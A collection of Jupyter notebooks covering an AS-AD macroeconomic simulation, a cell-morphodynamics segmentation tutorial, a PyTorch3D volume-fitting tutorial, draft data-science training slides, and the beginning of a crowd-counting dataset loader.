b &= \frac{1+a\phi\gamma}{1+a\gamma} \\
\beta &= \frac{1}{1+a\gamma}
\end{aligned}
$$
where $\hat{y}_{t}$ is the output gap, $\hat{\pi}_{t}$ is the inflation gap, $z_{t}$ is a AR(1) demand shock, and $\hat{s}_{t}$ is a AR(1) supply shock.
1. Choose **parameters**:
```
a = 0.4
gamma = 0.1
phi = 0.9
delta = 0.8
omega = 0.15
sigma_x = 1
sigma_c = 0.2
T = 100
```
2. Calculate **combined parameters**:
```
b = (1+a*phi*gamma)/(1+a*gamma)
beta = 1/(1+a*gamma)
```
3. Define **model functions**:
```
y_hat_func = lambda y_hat_lag,z,z_lag,s,s_lag: b*y_hat_lag + beta*(z-z_lag) - a*beta*s + a*beta*phi*s_lag
pi_hat_func = lambda pi_lag,z,z_lag,s,s_lag: b*pi_lag + beta*gamma*z - beta*phi*gamma*z_lag + beta*s - beta*phi*s_lag
z_func = lambda z_lag,x: delta*z_lag + x
s_func = lambda s_lag,c: omega*s_lag + c
```
4. Run the **simulation**:
```
import numpy as np
# a. set setup
np.random.seed(2015)
# b. allocate simulation data
x = np.random.normal(loc=0,scale=sigma_x,size=T)
c = np.random.normal(loc=0,scale=sigma_c,size=T)
z = np.zeros(T)
s = np.zeros(T)
y_hat = np.zeros(T)
pi_hat = np.zeros(T)
# c. run simulation
for t in range(1,T):
# i. update z and s
z[t] = z_func(z[t-1],x[t])
s[t] = s_func(s[t-1],c[t])
# ii. compute y og pi
y_hat[t] = y_hat_func(y_hat[t-1],z[t],z[t-1],s[t],s[t-1])
pi_hat[t] = pi_hat_func(pi_hat[t-1],z[t],z[t-1],s[t],s[t-1])
```
5. **Plot** the simulation:
```
import matplotlib.pyplot as plt
%matplotlib inline
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.plot(y_hat,label='$\\hat{y}$')
ax.plot(pi_hat,label='$\\hat{pi}$')
ax.set_xlabel('time')
ax.set_ylabel('percent')
ax.set_ylim([-8,8])
ax.legend(loc='upper left');
```
I like the **seaborn style**:
```
plt.style.use('seaborn')
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.plot(y_hat,label='$\\hat{y}$')
ax.plot(pi_hat,label='$\\hat{pi}$')
ax.set_xlabel('time')
ax.set_ylabel('percent')
ax.set_ylim([-8,8])
ax.legend(loc='upper left',facecolor='white',frameon='True');
```
# Using modules
A **module** is a **.py**-file with functions you import and can then call in the notebook.
Try to open **mymodule.py** and have a look.
```
import mymodule
x = 5
y = mymodule.myfunction(5)
print(y)
```
| github_jupyter |
# Analysis step by step
We provide here a step by step guide explaining how the different [code components](code_structure) to perform a complete analysis are used "under the hood" in case you want to re-use them or need a deeper understanding of the code.
## Dataset
We use here a synthetic dataset that simulates microscopy observation of a cell. You can find the dataset in [this folder](../snythetic/data) and has been generated using the [simulate_data](../synthetic/simulate_data.ipynb) notebook. The dataset is composed of 40 time points and three channels. A single cell starts as a circular object in the image center, and, over the 40 frames, the top cell edge moves upwards and downwards. The intensity in the first channel is homogeneous and is used for segmentation. In the two other channels, fluorescence is inhomogeneous and located at the cell bottom and also varies over time, including a time-shift between the second and third channels. The dataset is available [here](../synthetic/data) and has already been annotated and processed in ilastik with the result stored [here](../synthetic/data/Results_ilastik/segmented).
## morphosegmentation.dataset
The first step is to create a dataset object. For that we import the appropriate format from the module, in this case H5.
```
from morphodynamics.dataset import H5
```
Then we need to specify the location of the dataset:
```
data_folder = '../synthetic/data'
```
and specify which channels we intend to use. We need to provide the name of the stack used for segmentation:
```
morpho_name = 'synth_ch1.h5'
```
as well as a list of stack names whose intensity we want to analyze:
```
signal_name = ['synth_ch2.h5','synth_ch3.h5']
```
Now we can create our dataset using the H5 object:
```
data = H5(
expdir=data_folder,
signal_name=signal_name,
morpho_name=morpho_name,
)
```
The data object has several attributed and methods attached. For example we can import the images of the segmentation channel signal channels at time 8:
```
import matplotlib.pyplot as plt
time = 8
image1 = data.load_frame_morpho(time)
image2 = data.load_frame_signal(0, time)
image3 = data.load_frame_signal(1, time)
fig, ax = plt.subplots(1, 3, figsize=(16,5))
ax[0].imshow(image1, cmap = 'gray')
ax[0].set_title('Channel 1')
ax[1].imshow(image2, cmap = 'gray')
ax[1].set_title('Channel 2')
ax[2].imshow(image3, cmap = 'gray')
ax[2].set_title('Channel 3');
```
## Set folders
We need to define three folders:
- ```data_folder``` a folder that contains the image data
- ```analysis_folder```, a folder that will contain the results
- ```segmentation_folder```, a folder already containing pre-segmented data e.g. as output by Ilastik or that will host segmented images
```
from pathlib import Path
import os
import shutil
import numpy as np
segmentation_folder = Path("../synthetic/data/Ilastiksegmentation")
analysis_folder = Path("data/Results_step")
if not analysis_folder.is_dir():
analysis_folder.mkdir(parents=True)
```
## Set-up parameters for analysis
Now we create a Param object where we store parameters for our segmentation:
```
from morphodynamics.parameters import Param
param = Param(data_folder=data_folder, analysis_folder=analysis_folder, seg_folder=segmentation_folder,
morpho_name=morpho_name, signal_name=signal_name)
param.width = 5
param.depth = 5
param.lamnbda_ = 10
param.seg_algo = 'ilastik'
```
## Calibrate number of windows and cell location
Now we can finally run the analysis. In a first step, we need to estimate into how many layers (```J```) and how many windows per layer (```I```) our cell should be split based on the desired width and depth of a window. Here we also determine the center of mass position of the cell (```location```):
```
from morphodynamics.analysis_par import calibration, segment_all
location, J, I = calibration(data, param, model=None)
print(f'cell location: {location}')
print(f'number of windows per layer I: {I}')
print(f'number of layer J: {J}')
```
## Set-up results structure
We also need to setup a data structure to save some output information such as windowing information (which pixels belong to which window) or signal per window values. For that we use the ```Results``` structure from the ```morphodynamics.results``` module. To create "empty" fields we need to know the numebr of windows, time points and signal channels:
```
from morphodynamics.results import Results
# Result structures that will be saved to disk
res = Results(
J=J, I=I, num_time_points=data.K, num_channels=len(data.signal_name)
)
```
## Start dask
To make computation faster, the slow parts of the code are executed in parallel using the library Dask. One of the great advantages of that library is that it allows to seamlessly run the same code on a laptop and a cluster:
```
from dask.distributed import Client
client = Client()
```
## Segmentation
The first step of the pipeline is the cell segmentation. As we are using the ilastik pre-segmentation this step is automatically skipped here:
```
# Segment all images but don't select cell
if param.seg_algo == 'ilastik':
segmented = np.arange(0, data.K)
else:
segmented = segment_all(data, param, client, model=None)
```
## Tracking
We might have multiple cell in a field of view so that our segmentation output is not a simple binary mask but a labeled mask with multiple cells. We therefore have to decide which cell to consider. This can be done in the UI by picking a point in the image or by manually indicating the x-y location of a cell. Here we only have a single cell, so that selection is automatic. Once a cell has been selected in the first frame, we can track it across frames. This part of the analysis cannot be parallelized as the cell has to be tracked in successive frames:
```
from morphodynamics.analysis_par import track_all
# do the tracking
segmented = track_all(segmented, location, param)
```
The output of the tracking is stored as a series of binary masks names ```tracked_k_0.tif```, ```tracked_k_1.tif``` etc.
## Splining
Now that we have binary masks, we can analyze their contour and fit a spline function to them. The spline information is also stored in the ```res``` structure to avoid the need for recalculation. Here ```s_all``` is a dictionary with frames as keys and containing the spline information.
```
from morphodynamics.analysis_par import spline_all
# get all splines
s_all = spline_all(data.K, param.lambda_, param, client)
import skimage.io
from morphodynamics.splineutils import splevper
frame = 20
tracked_image = skimage.io.imread(analysis_folder.joinpath(f"segmented/tracked_k_{str(frame)}.tif"))
splined = splevper(np.linspace(0,1,100), s_all[frame])
fig, ax = plt.subplots(figsize=(7,7))
ax.imshow(tracked_image, cmap='gray')
ax.plot(splined[0], splined[1], 'r');
```
## Aligning splines and creating rasterized images
Given all the splines, we need now to align them to account for x-y shifts (e.g. if the cell is moving) and shifts of the spline along the contour. Once the alignment is done, we can create a rasterized version of the contour, i.e. an image of the contour where the pixel value corresponds to the curvilinear distance from the spline origin. This is late used to create windows.
The aligned splines are saved in ```s0prm_all``` and the shift in origin in ```ori_all```.
```
from morphodynamics.analysis_par import align_all
# align curves across frames and rasterize the windows
s0prm_all, ori_all = align_all(
s_all, data.shape, param.n_curve, param, client
)
raster_image = skimage.io.imread(analysis_folder.joinpath("segmented/rasterized_k_0.tif"))
fig, ax = plt.subplots(figsize=(7,7))
ax.imshow(raster_image, cmap = 'gray')
ax.set_title('Rasterized image');
```
As we calculate the spline origin shift between pairs of successive frames (so that the operation can be parallelized), we need to calculate a cumulative sum to recover the shift between frame 0 and frame ```f```:
```
# origin shifts have been computed pair-wise. Calculate the cumulative
# sum to get a "true" alignment on the first frame
res.orig = np.array([ori_all[k] for k in range(data.K)])
res.orig = np.cumsum(res.orig)
```
## Creating windows
Now that we have the rasterized image and the spline information, we can split each cell into layers with windows (using distance transform and curvilinear distance as "coordinates"):
```
from morphodynamics.analysis_par import windowing_all
# create the windows
windowing_all(s_all, res.orig, param, J, I, client)
```
## Window mapping
With the splines and the windows information, we can now find optimal points along successive splines that minimize deformation defined according to a certain metric combining xy-displacement across frames and curvilinear distance between points in a given frame.
It is important to mention here that the windows are **not** adjusted using that optimization. Windows are simply calculated based on splines that have been shift-corrected (x-y) and "curvilinear"-corrected so that they have matching positions. On the other hand the displacement is calculated by optimizing the location of points on the spline of frame = t+1 compared to *windows positions* at frame = t.
```
from morphodynamics.analysis_par import window_map_all
# define windows for each frame and compute pairs of corresponding
# points on successive splines for displacement measurement
t_all, t0_all = window_map_all(
s_all,
s0prm_all,
J,
I,
res.orig,
param.n_curve,
data.shape,
param,
client
)
```
## Extracting signals
In a final step, we used calculate the mean and standard deviation of the signal present in all calculated windows. We can also now compute the actual "optimized" displacement between successive frames. All these results are saved in the ```res``` structure.
```
from morphodynamics.analysis_par import extract_signal_all, compute_displacement
# Signals extracted from various imaging channels
mean_signal, var_signal = extract_signal_all(data, param, J, I)
# compute displacements
res.displacement = compute_displacement(s_all, t_all, t0_all)
# Save variables for archival
res.spline = [s_all[k] for k in range(data.K)]
res.param0 = [t0_all[k] for k in t0_all]
res.param = [t_all[k] for k in t_all]
res.mean = mean_signal
res.var = var_signal
```
## Check results
We can have a look at the results to estimate if everything worked as expected.
```
import pickle
import skimage.io
t = 0
name = os.path.join(
param.analysis_folder,
"segmented",
"window_image_k_" + str(t) + ".tif",
)
image = data.load_frame_morpho(t)
b0 = skimage.io.imread(name)
b0 = b0.astype(float)
b0[b0 == 0] = np.nan
fig, ax = plt.subplots(figsize=(10,10))
ax.imshow(image, cmap='gray')
ax.imshow(b0, alpha = 0.5, cmap='Reds',vmin=0,vmax=0.5);
```
| github_jupyter |
```
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
```
# Fit a volume via raymarching
This tutorial shows how to fit a volume given a set of views of a scene using differentiable volumetric rendering.
More specifically, this tutorial will explain how to:
1. Create a differentiable volumetric renderer.
2. Create a Volumetric model (including how to use the `Volumes` class).
3. Fit the volume based on the images using the differentiable volumetric renderer.
4. Visualize the predicted volume.
## 0. Install and Import modules
Ensure `torch` and `torchvision` are installed. If `pytorch3d` is not installed, install it using the following cell:
```
import os
import sys
import torch
need_pytorch3d=False
try:
import pytorch3d
except ModuleNotFoundError:
need_pytorch3d=True
if need_pytorch3d:
if torch.__version__.startswith("1.7") and sys.platform.startswith("linux"):
# We try to install PyTorch3D via a released wheel.
version_str="".join([
f"py3{sys.version_info.minor}_cu",
torch.version.cuda.replace(".",""),
f"_pyt{torch.__version__[0:5:2]}"
])
!pip install pytorch3d -f https://dl.fbaipublicfiles.com/pytorch3d/packaging/wheels/{version_str}/download.html
else:
# We try to install PyTorch3D from source.
!curl -LO https://github.com/NVIDIA/cub/archive/1.10.0.tar.gz
!tar xzf 1.10.0.tar.gz
os.environ["CUB_HOME"] = os.getcwd() + "/cub-1.10.0"
!pip install 'git+https://github.com/facebookresearch/pytorch3d.git@stable'
import os
import sys
import time
import json
import glob
import torch
import math
from tqdm.notebook import tqdm
import matplotlib.pyplot as plt
import numpy as np
from PIL import Image
from IPython import display
# Data structures and functions for rendering
from pytorch3d.structures import Volumes
from pytorch3d.renderer import (
FoVPerspectiveCameras,
VolumeRenderer,
NDCGridRaysampler,
EmissionAbsorptionRaymarcher
)
from pytorch3d.transforms import so3_exponential_map
# add path for demo utils functions
sys.path.append(os.path.abspath(''))
from utils.plot_image_grid import image_grid
from utils.generate_cow_renders import generate_cow_renders
# obtain the utilized device
if torch.cuda.is_available():
device = torch.device("cuda:0")
torch.cuda.set_device(device)
else:
device = torch.device("cpu")
```
## 1. Generate images of the scene and masks
The following cell generates our training data.
It renders the cow mesh from the `fit_textured_mesh.ipynb` tutorial from several viewpoints and returns:
1. A batch of image and silhouette tensors that are produced by the cow mesh renderer.
2. A set of cameras corresponding to each render.
Note: For the purpose of this tutorial, which aims at explaining the details of volumetric rendering, we do not explain how the mesh rendering, implemented in the `generate_cow_renders` function, works. Please refer to `fit_textured_mesh.ipynb` for a detailed explanation of mesh rendering.
```
target_cameras, target_images, target_silhouettes = generate_cow_renders(num_views=40)
print(f'Generated {len(target_images)} images/silhouettes/cameras.')
```
## 2. Initialize the volumetric renderer
The following initializes a volumetric renderer that emits a ray from each pixel of a target image and samples a set of uniformly-spaced points along the ray. At each ray-point, the corresponding density and color value is obtained by querying the corresponding location in the volumetric model of the scene (the model is described & instantiated in a later cell).
The renderer is composed of a *raymarcher* and a *raysampler*.
- The *raysampler* is responsible for emitting rays from image pixels and sampling the points along them. Here, we use the `NDCGridRaysampler` which follows the standard PyTorch3D coordinate grid convention (+X from right to left; +Y from bottom to top; +Z away from the user).
- The *raymarcher* takes the densities and colors sampled along each ray and renders each ray into a color and an opacity value of the ray's source pixel. Here we use the `EmissionAbsorptionRaymarcher` which implements the standard Emission-Absorption raymarching algorithm.
```
# render_size describes the size of both sides of the
# rendered images in pixels. We set this to the same size
# as the target images. I.e. we render at the same
# size as the ground truth images.
render_size = target_images.shape[1]
# Our rendered scene is centered around (0,0,0)
# and is enclosed inside a bounding box
# whose side is roughly equal to 3.0 (world units).
volume_extent_world = 3.0
# 1) Instantiate the raysampler.
# Here, NDCGridRaysampler generates a rectangular image
# grid of rays whose coordinates follow the PyTorch3D
# coordinate conventions.
# Since we use a volume of size 128^3, we sample n_pts_per_ray=150,
# which roughly corresponds to a one ray-point per voxel.
# We further set the min_depth=0.1 since there is no surface within
# 0.1 units of any camera plane.
raysampler = NDCGridRaysampler(
image_width=render_size,
image_height=render_size,
n_pts_per_ray=150,
min_depth=0.1,
max_depth=volume_extent_world,
)
# 2) Instantiate the raymarcher.
# Here, we use the standard EmissionAbsorptionRaymarcher
# which marches along each ray in order to render
# each ray into a single 3D color vector
# and an opacity scalar.
raymarcher = EmissionAbsorptionRaymarcher()
# Finally, instantiate the volumetric render
# with the raysampler and raymarcher objects.
renderer = VolumeRenderer(
raysampler=raysampler, raymarcher=raymarcher,
)
```
## 3. Initialize the volumetric model
Next we instantiate a volumetric model of the scene. This quantizes the 3D space to cubical voxels, where each voxel is described with a 3D vector representing the voxel's RGB color and a density scalar which describes the opacity of the voxel (ranging between [0-1], the higher the more opaque).
In order to ensure the range of densities and colors is between [0-1], we represent both volume colors and densities in the logarithmic space. During the forward function of the model, the log-space values are passed through the sigmoid function to bring the log-space values to the correct range.
Additionally, `VolumeModel` contains the renderer object. This object stays unaltered throughout the optimization.
In this cell we also define the `huber` loss function which computes the discrepancy between the rendered colors and masks.
```
class VolumeModel(torch.nn.Module):
def __init__(self, renderer, volume_size=[64] * 3, voxel_size=0.1):
super().__init__()
# After evaluating torch.sigmoid(self.log_colors), we get
# densities close to zero.
self.log_densities = torch.nn.Parameter(-4.0 * torch.ones(1, *volume_size))
# After evaluating torch.sigmoid(self.log_colors), we get
# a neutral gray color everywhere.
self.log_colors = torch.nn.Parameter(torch.zeros(3, *volume_size))
self._voxel_size = voxel_size
# Store the renderer module as well.
self._renderer = renderer
def forward(self, cameras):
batch_size = cameras.R.shape[0]
# Convert the log-space values to the densities/colors
densities = torch.sigmoid(self.log_densities)
colors = torch.sigmoid(self.log_colors)
# Instantiate the Volumes object, making sure
# the densities and colors are correctly
# expanded batch_size-times.
volumes = Volumes(
densities = densities[None].expand(
batch_size, *self.log_densities.shape),
features = colors[None].expand(
batch_size, *self.log_colors.shape),
voxel_size=self._voxel_size,
)
# Given cameras and volumes, run the renderer
# and return only the first output value
# (the 2nd output is a representation of the sampled
# rays which can be omitted for our purpose).
return self._renderer(cameras=cameras, volumes=volumes)[0]
# A helper function for evaluating the smooth L1 (huber) loss
# between the rendered silhouettes and colors.
def huber(x, y, scaling=0.1):
diff_sq = (x - y) ** 2
loss = ((1 + diff_sq / (scaling**2)).clamp(1e-4).sqrt() - 1) * float(scaling)
return loss
```
## 4. Fit the volume
Here we carry out the volume fitting with differentiable rendering.
In order to fit the volume, we render it from the viewpoints of the `target_cameras`
and compare the resulting renders with the observed `target_images` and `target_silhouettes`.
The comparison is done by evaluating the mean huber (smooth-l1) error between corresponding
pairs of `target_images`/`rendered_images` and `target_silhouettes`/`rendered_silhouettes`.
```
# First move all relevant variables to the correct device.
target_cameras = target_cameras.to(device)
target_images = target_images.to(device)
target_silhouettes = target_silhouettes.to(device)
# Instantiate the volumetric model.
# We use a cubical volume with the size of
# one side = 128. The size of each voxel of the volume
# is set to volume_extent_world / volume_size s.t. the
# volume represents the space enclosed in a 3D bounding box
# centered at (0, 0, 0) with the size of each side equal to 3.
volume_size = 128
volume_model = VolumeModel(
renderer,
volume_size=[volume_size] * 3,
voxel_size = volume_extent_world / volume_size,
).to(device)
# Instantiate the Adam optimizer. We set its master learning rate to 0.1.
lr = 0.1
optimizer = torch.optim.Adam(volume_model.parameters(), lr=lr)
# We do 300 Adam iterations and sample 10 random images in each minibatch.
batch_size = 10
n_iter = 300
for iteration in range(n_iter):
# In case we reached the last 75% of iterations,
# decrease the learning rate of the optimizer 10-fold.
if iteration == round(n_iter * 0.75):
print('Decreasing LR 10-fold ...')
optimizer = torch.optim.Adam(
volume_model.parameters(), lr=lr * 0.1
)
# Zero the optimizer gradient.
optimizer.zero_grad()
# Sample random batch indices.
batch_idx = torch.randperm(len(target_cameras))[:batch_size]
# Sample the minibatch of cameras.
batch_cameras = FoVPerspectiveCameras(
R = target_cameras.R[batch_idx],
T = target_cameras.T[batch_idx],
znear = target_cameras.znear[batch_idx],
zfar = target_cameras.zfar[batch_idx],
aspect_ratio = target_cameras.aspect_ratio[batch_idx],
fov = target_cameras.fov[batch_idx],
device = device,
)
# Evaluate the volumetric model.
rendered_images, rendered_silhouettes = volume_model(
batch_cameras
).split([3, 1], dim=-1)
# Compute the silhouette error as the mean huber
# loss between the predicted masks and the
# target silhouettes.
sil_err = huber(
rendered_silhouettes[..., 0], target_silhouettes[batch_idx],
).abs().mean()
# Compute the color error as the mean huber
# loss between the rendered colors and the
# target ground truth images.
color_err = huber(
rendered_images, target_images[batch_idx],
).abs().mean()
# The optimization loss is a simple
# sum of the color and silhouette errors.
loss = color_err + sil_err
# Print the current values of the losses.
if iteration % 10 == 0:
print(
f'Iteration {iteration:05d}:'
+ f' color_err = {float(color_err):1.2e}'
+ f' mask_err = {float(sil_err):1.2e}'
)
# Take the optimization step.
loss.backward()
optimizer.step()
# Visualize the renders every 40 iterations.
if iteration % 40 == 0:
# Visualize only a single randomly selected element of the batch.
im_show_idx = int(torch.randint(low=0, high=batch_size, size=(1,)))
fig, ax = plt.subplots(2, 2, figsize=(10, 10))
ax = ax.ravel()
clamp_and_detach = lambda x: x.clamp(0.0, 1.0).cpu().detach().numpy()
ax[0].imshow(clamp_and_detach(rendered_images[im_show_idx]))
ax[1].imshow(clamp_and_detach(target_images[batch_idx[im_show_idx], ..., :3]))
ax[2].imshow(clamp_and_detach(rendered_silhouettes[im_show_idx, ..., 0]))
ax[3].imshow(clamp_and_detach(target_silhouettes[batch_idx[im_show_idx]]))
for ax_, title_ in zip(
ax,
("rendered image", "target image", "rendered silhouette", "target silhouette")
):
ax_.grid("off")
ax_.axis("off")
ax_.set_title(title_)
fig.canvas.draw(); fig.show()
display.clear_output(wait=True)
display.display(fig)
```
## 5. Visualizing the optimized volume
Finally, we visualize the optimized volume by rendering from multiple viewpoints that rotate around the volume's y-axis.
```
def generate_rotating_volume(volume_model, n_frames = 50):
logRs = torch.zeros(n_frames, 3, device=device)
logRs[:, 1] = torch.linspace(0.0, 2.0 * 3.14, n_frames, device=device)
Rs = so3_exponential_map(logRs)
Ts = torch.zeros(n_frames, 3, device=device)
Ts[:, 2] = 2.7
frames = []
print('Generating rotating volume ...')
for R, T in zip(tqdm(Rs), Ts):
camera = FoVPerspectiveCameras(
R=R[None],
T=T[None],
znear = target_cameras.znear[0],
zfar = target_cameras.zfar[0],
aspect_ratio = target_cameras.aspect_ratio[0],
fov = target_cameras.fov[0],
device=device,
)
frames.append(volume_model(camera)[..., :3].clamp(0.0, 1.0))
return torch.cat(frames)
with torch.no_grad():
rotating_volume_frames = generate_rotating_volume(volume_model, n_frames=7*4)
image_grid(rotating_volume_frames.clamp(0., 1.).cpu().numpy(), rows=4, cols=7, rgb=True, fill=True)
plt.show()
```
## 6. Conclusion
In this tutorial, we have shown how to optimize a 3D volumetric representation of a scene such that the renders of the volume from known viewpoints match the observed images for each viewpoint. The rendering was carried out using the PyTorch3D's volumetric renderer composed of an `NDCGridRaysampler` and an `EmissionAbsorptionRaymarcher`.
| github_jupyter |
# Data Science Training `#01` (draft)
# Roadmap
## 01. What is data science ?
## 10. How data science fits into the big picture
## 11. Practical data science workflows (next)
## 01. What is data science ?
[](https://hbr.org/2012/10/data-scientist-the-sexiest-job-of-the-21st-century)
## 01.1. Definitions / Venn war
The term of **data science** itself **is still contested**, but a concise definition can be brought here:
> To do data science, you have to be able to **find and process large datasets**. You’ll often need to understand and use **programming**, **math**, and **technical communication** skills. ***You’ll need to be a unicorn that can put together a lot of different skillsets***.
> + Roger Huang, **Springboard** blog - [source](https://www.springboard.com/blog/data-science-definition/)
A longer definition might be the one offered by the now famous HBR article, **Data Scientist: The Sexiest Job of the 21st Century** (Oct 2012):
> [...] what data scientists do is **make discoveries while swimming in data** [...] They identify rich data sources, **join them with other**, potentially incomplete data sources, and **clean the resulting set**. [...]
> [...] Often they are **creative in displaying information visually** and making the **patterns** they find clear and compelling. **They advise** executives and product managers on the **implications of the data for products, processes, and decisions**.
> Given the nascent state of their trade, it often falls to data scientists to **fashion their own tools and even conduct academic-style research**. Yahoo, one of the firms that **employed a group of data scientists** early on, was **instrumental in developing Hadoop.** [...]
> **What kind of person does all this?** What abilities make a data scientist successful? Think of him or her as a **hybrid of data hacker, analyst, communicator, and trusted adviser**. The combination is extremely powerful—and rare.
Source: [hbr.org/2012/10/data-scientist-the-sexiest-job-of-the-21st-century](https://hbr.org/2012/10/data-scientist-the-sexiest-job-of-the-21st-century)
<center>
**The most frequently pointed source point**:

Source: [drewconway.com/zia/2013/3/26/the-data-science-venn-diagram](http://drewconway.com/zia/2013/3/26/the-data-science-venn-diagram)
</center>
<center>
**It gets crazier**:

</center>
<center>
[](http://datascience.nyu.edu/what-is-data-science/)
Source: [datascience.nyu.edu/what-is-data-science/](http://datascience.nyu.edu/what-is-data-science/)
</center>

<center>

<!-- <img src="assets/map_venn.png" width="800px" height="auto" /> -->
Source: `Deep Learning` - **Ian Goodfellow** and **Yoshua Bengio** and Aaron Courville - [source](http://www.deeplearningbook.org/contents/intro.html) (pg. 9)
</center>
## 01.2. History of DS
<center>

**SIGKDD** is the ACM's **Special Interest Group** (SIG) on **Knowledge Discovery and Data Mining** (official ACM SIG since 1998, started in 1995).
</center>
<center>
**Data Science: an Action Plan for Expanding the Technical Areas of the Field of Statistics**
William S. Cleveland, Statistics Research, Bell Labs
First published: **April 2001**
- [Wiley page](http://onlinelibrary.wiley.com/doi/10.1111/j.1751-5823.2001.tb00477.x/abstract), [fulltext](http://www.datascienceassn.org/sites/default/files/Data%20Science%20An%20Action%20Plan%20for%20Expanding%20the%20Technical%20Areas%20of%20the%20Field%20of%20Statistics.pdf)
</center>
> This document describes a **plan to enlarge the major areas of technical work of the field of statistics**. Because
the plan is ambitious and **implies substantial change**, the **altered field will be called “data science.”** [...]
> The six areas and their percentages are the following:
+ **(25%) Multidisciplinary Investigations**: data analysis collaborations in a collection of subject matter
areas.
+ **(20%) Models and Methods for Data**: statistical models; methods of model building; methods of estimation
and distribution based on probabilistic inference.
+ **(15%) Computing with Data**: hardware systems; software systems; computational algorithms.
+ **(15%) Pedagogy**: curriculum planning and approaches to teaching for elementary school, secondary
school, college, graduate school, continuing education, and corporate training.
+ **(5%) Tool Evaluation**: surveys of tools in use in practice, surveys of perceived needs for new tools, and
studies of the processes for developing new tools.
+ **(20%) Theory**: foundations of data science; general approaches to models and methods, to computing
with data, to teaching, and to tool evaluation; mathematical investigations of models and methods, of
computing with data, of teaching, and of evaluation.
## 10. How data science fits into the big picture
+ statistics: statistics
+ learning and generalizing: ML / ANN
+ bayesian generalization - one-shot learning, pymc ...
+ optimization field: MCDA / MODA

Machine learning types:

<center><img src="assets/map_sklearn.png" width="900" height="600" /></center>
## 11. Practical data science workflows
```
%%svg
<svg width="720" height="80"><g>
<g><rect x="0" y="0" width="150" height="70" fill="#FFF" stroke="#000"></rect>
<text x="10" y="30" font-family="Verdana" font-size="20" fill="#444">Analysis</text></g>
<g transform="translate(170,0)">
<polyline fill="none" stroke="#AAA" stroke-width="1" stroke-linecap="round" stroke-linejoin="round" points="
0.375,0.375 45.63,38.087 0.375,75.8 "/>
</g>
<g transform="translate(230,0)">
<rect x="0" y="0" width="400" height="70" fill="#FFF" stroke="#000"></rect>
<text x="10" y="30" font-family="Verdana" font-size="20" fill="#444">Modelling</text></g>
</g></svg>
```
### Machine learning steps
> Asking the right question => Preparing Data => Selecting the algorithm => Training the model
The process may require to return to a previous point, such as:
- changing the question
- sanitizing, extending the data
- changing the algorithm
- (supervised) extending the test data
# Links
+ **trainings** to be found here: https://github.com/xR86/ml-stuff/tree/master/labs-machine-learning
+ **01. What is data science ?** sources:
+ 01.1. Definitions / Venn war
- quora responses are resourceful - [What is data science? - Quora](https://www.quora.com/What-is-data-science) and [What is a data scientist? - Quora](https://www.quora.com/What-is-a-data-scientist-3)
+ 01.2. History of DS
- [blogs.nvidia.com/blog/2016/07/29/whats-difference-artificial-intelligence-machine-learning-deep-learning-ai/](https://blogs.nvidia.com/blog/2016/07/29/whats-difference-artificial-intelligence-machine-learning-deep-learning-ai/)
- [kdnuggets.com/2016/10/battle-data-science-venn-diagrams.html](http://www.kdnuggets.com/2016/10/battle-data-science-venn-diagrams.html)
- [slideshare.net/AltonAlexander/a-successful-data-science-proof-of-concept-in-7-pragmatic-steps](https://www.slideshare.net/AltonAlexander/a-successful-data-science-proof-of-concept-in-7-pragmatic-steps)
+ Extra resources
- when it comes to deep learning, pay attention to Canadian uni courses - [iro.umontreal.ca/~bengioy/talks/lisbon-mlss-19juillet2015.pdf](http://www.iro.umontreal.ca/~bengioy/talks/lisbon-mlss-19juillet2015.pdf)
- [unsupervised vs supervised ML](https://stats.stackexchange.com/questions/110395/what-are-basic-differences-between-kernel-approaches-to-unsupervised-and-supervi)
- [amazon.com/Think-Like-Scientist-step-step/dp/1633430278](https://www.amazon.com/Think-Like-Scientist-step-step/dp/1633430278)
- [jixta.files.wordpress.com/2015/11/machinelearningalgorithms.png](https://jixta.files.wordpress.com/2015/11/machinelearningalgorithms.png)
- [images.slideplayer.com/32/9836672/slides/slide_3.jpg](http://images.slideplayer.com/32/9836672/slides/slide_3.jpg)
<center>
<h1>Thanks !</h1>
</center>
---
| github_jupyter |
```
from __future__ import print_function, division
import os, sys
import torch
import pandas as pd
from skimage import io, transform
import numpy as np
import matplotlib.pyplot as plt
from torch.utils.data import Dataset, DataLoader
from torchvision import transforms, utils
from PIL import Image
dataroot = '/home/abhijit/Downloads/video frames/crowd/'
csv = '/home/abhijit/Downloads/video frames/optical flow/optical flow/crowdgroundtruth.xlsx'
dataroot_2 = '/home/abhijit/Downloads/video frames/optical flow/'
# Number of workers for dataloader
workers = 2
# Batch size during training
batch_size = 128
# Spatial size of training images. All images will be resized to this
# size using a transformer.
image_size = 64
# Number of channels in the training images. For color images this is 3
nc = 3
# Size of z latent vector (i.e. size of generator input)
nz = 100
# Size of feature maps in generator
ngf = 64
# Size of feature maps in discriminator
ndf = 64
# Number of training epochs
num_epochs = 5
# Learning rate for optimizers
lr = 0.0002
# Beta1 hyperparam for Adam optimizers
beta1 = 0.5
# Number of GPUs available. Use 0 for CPU mode.
ngpu = 1
```
# Reading The Ground Truth
```
all_ = pd.read_excel(csv, header = 0)
from sklearn.model_selection import train_test_split
train_df, test_df = train_test_split(all_, test_size=0.3, random_state = 0)
valid_df, test_df = train_test_split(test_df, test_size=.66, random_state = 0)
```
# DataLoader for Cycle GAN
```
class GANDataset(Dataset):
def __init__(self, csv_file,root_dir,df,root_dir_2, transform=None):
self.landmarks_frame = pd.read_excel(csv_file, header = 0)
self.read_number = pd.read_excel(csv_file,header = 1)
self.root_dir = root_dir
self.root_dir_2 = root_dir_2
self.transform = transform
self.df = df
def __len__(self):
#return len(os.listdir(self.root_dir_2))
return len(self.df)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
img_name = self.df.iloc[idx]['Frame1']
number_left = self.df.iloc[idx,3]
number_right = self.df.iloc[idx,4]
#number_combined = self.df.iloc[idx,5]
number_combined = number_left + number_right
#number_all = self.landmarks_frame['left_to_right'][idx:idx]
#number_all = 0
number_all = np.array([number_left,number_right, number_combined])
ix = ['scene1','scene2','scene3','scene4','scene5','scene6','scene7','scene8','scene9', 'scene10','scene11','scene12','scene13','scene14','scene15']
jx = ['scene10','scene11','scene12','scene13','scene14','scene15']
#img_name = 'scene6medcam1frame780'
i = ''
x = 0
for j in jx:
if j in img_name:
x = 1
break
i = j
if x==0:
for i in ix:
if i in img_name:
break
dense = ['low', 'med', 'high']
cam = ['cam1', 'cam2', 'cam3']
occlu = ['', 'occlu']
